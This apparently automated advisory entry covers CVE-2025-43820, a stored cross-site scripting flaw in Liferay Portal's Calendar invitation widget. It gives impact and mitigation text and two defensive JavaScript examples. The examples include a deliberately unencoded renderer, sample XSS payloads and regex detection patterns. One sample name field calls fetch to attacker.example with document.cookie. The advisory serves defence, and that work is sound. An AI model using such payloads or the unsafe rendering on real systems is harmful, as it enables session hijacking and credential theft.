CVE-2025-43820: CWE-79: Cross-site Scripting in Liferay Portal
Multiple cross-site scripting (XSS) vulnerabilities in the Calendar widget when inviting users to an event in Liferay Portal 7.4.3.35 through 7.4.3.110, and Liferay DXP 2023.Q4.0 through 2023.Q4.4, 2023.Q3.1 through 2023.Q3.6, 7.4 update 35 through update 92, and 7.3 update 25 through update 35 allow remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a user's (1) First Name, (2) Middle text, or (3) Last Name text fields.
AI Analysis
Technical Summary
CVE-2025-43820 is a medium-severity cross-site scripting (XSS) vulnerability affecting Liferay Portal 7.4.3.35 through 7.4.3.110 and Liferay DXP 2023.Q4.0 through 2023.Q4.4, 2023.Q3.1 through 2023.Q3.6, 7.4 update 35 through update 92, and 7.3 update 25 through update 35. The flaw is in the Calendar widget's event-invitation functionality: when the widget displays a user it renders that user's First Name, Middle and Last Name fields without adequate output encoding, so a payload placed in one of those profile fields (for instance by a low-privileged attacker editing their own profile) is emitted as live HTML or script in the invitation UI. This is CWE-79, improper neutralization of input during web page generation. The CVSS 4.0 base score of 4.8 (medium) reflects a network attack vector (AV:N), low attack complexity (AC:L), low privileges required (PR:L), active user interaction (UI:A) and limited impact on confidentiality, integrity and availability. In practice the attacker needs a portal account that can set the name fields and must get a victim to load the affected calendar view, such as an event invitation that lists the attacker. No exploitation in the wild has been reported and no patch links are recorded in this entry. A successful attack runs script in the victim's browser within the portal's origin, enabling session hijacking, credential theft or actions performed with the victim's privileges. Given that Liferay Portal is widely used for enterprise content management and collaboration, organizations running these versions for internal or external scheduling are exposed.
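The rendering bug class described above, reduced to an added example that is not Liferay's code: a widget that builds its invitee list by string interpolation passes a name field straight into markup, while the hardened version HTML-encodes each field before it enters the template. The user object shape, the function names and the attacker profile are assumptions constructed for illustration.

```javascript
// Added example (not Liferay's code): how a stored name field becomes XSS when a
// calendar widget builds HTML by string interpolation, and the encoding fix.
// The {firstName, middleName, lastName} shape is an assumption for illustration.

// Minimal HTML entity encoder for text placed into an element body or a
// double-quoted attribute value. All five characters that can change parsing
// context are replaced, so the value can never close the attribute or open a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// VULNERABLE (CWE-79 pattern): user-controlled fields are interpolated raw into
// markup, both into the attribute and into the element body.
function renderInviteeUnsafe(user) {
  const full = `${user.firstName} ${user.middleName} ${user.lastName}`;
  return `<li class="invitee" title="${full}">${full}</li>`;
}

// FIXED: every user-controlled value is encoded at the point it enters HTML.
// Encoding at output (not on save) also covers records that were poisoned
// before the fix, or that arrive from an upstream directory.
function renderInviteeSafe(user) {
  const full = [user.firstName, user.middleName, user.lastName]
    .filter(Boolean)
    .map(escapeHtml)
    .join(' ');
  return `<li class="invitee" title="${full}">${full}</li>`;
}

// Constructed attacker profile: the payload is stored in the "Middle" name field.
const attacker = {
  firstName: 'Alice',
  middleName: '<img src=x onerror=alert(document.cookie)>',
  lastName: 'Smith',
};

const unsafeHtml = renderInviteeUnsafe(attacker); // contains a live <img onerror=...>
const safeHtml = renderInviteeSafe(attacker);     // tag is rendered as text: &lt;img ...&gt;

console.log('unsafe:', unsafeHtml);
console.log('safe:  ', safeHtml);
```

The fix is deliberately an output-encoding step rather than input filtering: the name fields can legitimately contain apostrophes and ampersands, and filtering on save would not protect records that are already stored. If the value were instead set through the DOM (for example via `textContent` rather than `innerHTML`), no manual encoding would be needed, because the browser never parses it as markup.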
Potential Impact
For European organizations using affected Liferay Portal versions, this vulnerability could lead to targeted attacks exploiting the Calendar widget to execute malicious scripts within users' browsers. This could compromise user sessions, leak sensitive information, or facilitate further attacks such as phishing or privilege escalation within the portal. Since Liferay is often used in corporate intranets, government portals, and public-facing websites, the impact ranges from data confidentiality breaches to disruption of business processes. The requirement for user interaction and low privileges reduces the likelihood of widespread automated exploitation but does not eliminate risk, especially in environments with high user collaboration and frequent event invitations. The vulnerability could be leveraged by attackers to gain footholds in organizational networks or to conduct espionage, particularly in sectors like finance, government, and critical infrastructure where Liferay is deployed. Additionally, the cross-site scripting flaw could be chained with other vulnerabilities to escalate impact. The medium CVSS score reflects moderate risk but should not be underestimated given the potential for targeted social engineering attacks.
Mitigation Recommendations
Organizations should immediately audit their Liferay Portal and DXP deployments to identify instances on the affected versions and restrict access to the Calendar widget where feasible. Because the payload is stored in profile name fields, also scan existing user records for First, Middle or Last Name values containing HTML metacharacters, tag openers or event-handler attributes: a poisoned profile fires every time it is rendered until it is cleaned, and the scan is the quickest way to find out whether the flaw has already been used against you. Until a fixed version is available, the practical controls are: restrict self-service editing of name fields where an identity provider or directory is the source of truth; ensure any custom templates or themes of your own that render user names HTML-encode those values; add WAF rules that detect and block typical XSS payloads submitted to the profile and calendar endpoints (treat this as detection and a speed bump, not a fix, since encoding-based bypasses are routine); deploy a Content Security Policy that disallows inline script so a stored payload cannot execute even if it is rendered, testing it against the portal's own pages first since administrative UIs commonly rely on inline script; and limit Calendar use for external or untrusted accounts. Educate users to be cautious with unexpected event invitations and notifications, monitor logs for unusual calendar and profile-edit activity, and prioritize deployment of the vendor fix as soon as it is published. Keep all components of the Liferay environment current to reduce exposure to similar vulnerabilities.
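One way to do the profile audit recommended above, as an added example rather than anything Liferay ships: a scan over a user export for name fields that already contain markup or script indicators. The export shape and field names are assumptions (adapt them to whatever your export actually produces), and the sample records are constructed.

```javascript
// Added example (not part of the advisory or of Liferay): audit a user export for
// First/Middle/Last Name values that already carry markup or script indicators.
// The export format (array of {screenName, firstName, middleName, lastName}) is an
// assumption; the three sample records below are constructed.

// Indicators that a plain name should never contain. A bare "&" or "'" is
// deliberately not flagged, so "Ben & Jerry" and "O'Neil" stay clean.
const SUSPICIOUS = [
  /<\s*\/?\s*[a-z]/i,   // HTML tag opener, including "<svg/onload" style
  /\bon[a-z]+\s*=/i,    // inline event handler: onerror=, onload=, onmouseover=
  /javascript\s*:/i,    // javascript: URL scheme
  /&#?[a-z0-9]+;/i,     // pre-encoded entities (double-encoding or filter evasion)
];

const NAME_FIELDS = ['firstName', 'middleName', 'lastName'];

// Returns one finding per suspicious field of a single user record.
function nameFindings(user) {
  const findings = [];
  for (const field of NAME_FIELDS) {
    const value = user[field];
    if (typeof value !== 'string' || value === '') continue;
    const matched = SUSPICIOUS.filter((re) => re.test(value)).map((re) => re.source);
    if (matched.length > 0) {
      findings.push({ screenName: user.screenName, field, value, matched });
    }
  }
  return findings;
}

// Scans the whole export; the result is what goes to triage.
function auditUsers(users) {
  return users.flatMap(nameFindings);
}

// Constructed sample export: one benign user, one stored payload, one
// pre-encoded payload that a naive "<" search would miss.
const sampleExport = [
  { screenName: 'bob', firstName: 'Bob', middleName: '', lastName: "O'Neil" },
  {
    screenName: 'mallory',
    firstName: 'Mal',
    middleName: '<svg/onload=fetch("https://attacker.example/?c="+document.cookie)>',
    lastName: 'Ory',
  },
  { screenName: 'eve', firstName: 'Eve', middleName: '', lastName: 'Jones&#60;script&#62;' },
];

const findings = auditUsers(sampleExport);
for (const f of findings) {
  console.log(`${f.screenName}.${f.field} matched ${f.matched.join(' | ')}: ${f.value}`);
}
```

Every hit still needs human triage, but the list is small enough to review by hand, and any record confirmed as a payload should be corrected in the source of truth (the directory or IdP, if names are synced from one) rather than only in the portal, or it will be written back on the next sync.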
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Belgium, Sweden
Technical Details
- Data Version: 5.1
- Assigner Short Name: Liferay
- Date Reserved: 2025-04-17T10:55:35.684Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68db1fa6a473ffe031e278ae
Added to database: 9/30/2025, 12:09:10 AM
Last enriched: 9/30/2025, 12:11:09 AM
Last updated: 10/2/2025, 10:01:21 PM
Related Threats
- CVE-2025-10895 (Low)
- CVE-2025-61668: CWE-476: NULL Pointer Dereference in plone volto (High)
- CVE-2025-61600: CWE-400: Uncontrolled Resource Consumption in stalwartlabs stalwart (High)
- CVE-2025-54086: Vulnerability in Absolute Security Secure Access (Medium)
- CVE-2025-61603: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in LabRedesCefetRJ WeGIA (Critical)